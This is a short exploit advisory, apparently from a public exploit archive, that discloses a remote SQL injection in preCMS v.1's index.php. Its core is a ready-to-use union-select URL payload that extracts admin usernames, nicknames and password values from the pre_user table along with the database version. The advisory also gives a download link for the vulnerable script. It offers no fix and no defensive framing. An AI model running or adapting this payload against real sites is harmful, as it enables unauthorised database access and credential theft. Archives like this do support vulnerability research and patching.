id: 3424
date: 07/16/2008
title: preCMS v.1 (index.php page) Remote SQL injection Vulnerability
author: Mr.SQL
cves: 

==============================================================
preCMS v.1 (index.php page) Remote SQL injection Vulnerability
==============================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## preCMS v.1 ( index.php page )
##                            
###############################################################
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/index.php?page=UserProfil&id=-1'+union+select+1,2,concat_ws(0x3a3a,admin,nick,password),4,@@version+from+pre_user/*
##
########################
########################
 -[[ NOTE ]]-
1 ) Download script :  http://www.precoc.com/cms/preedit/file/0axee0401vk.rar
 
#######################################################################################################



#  0day.today [2023-03-23]  #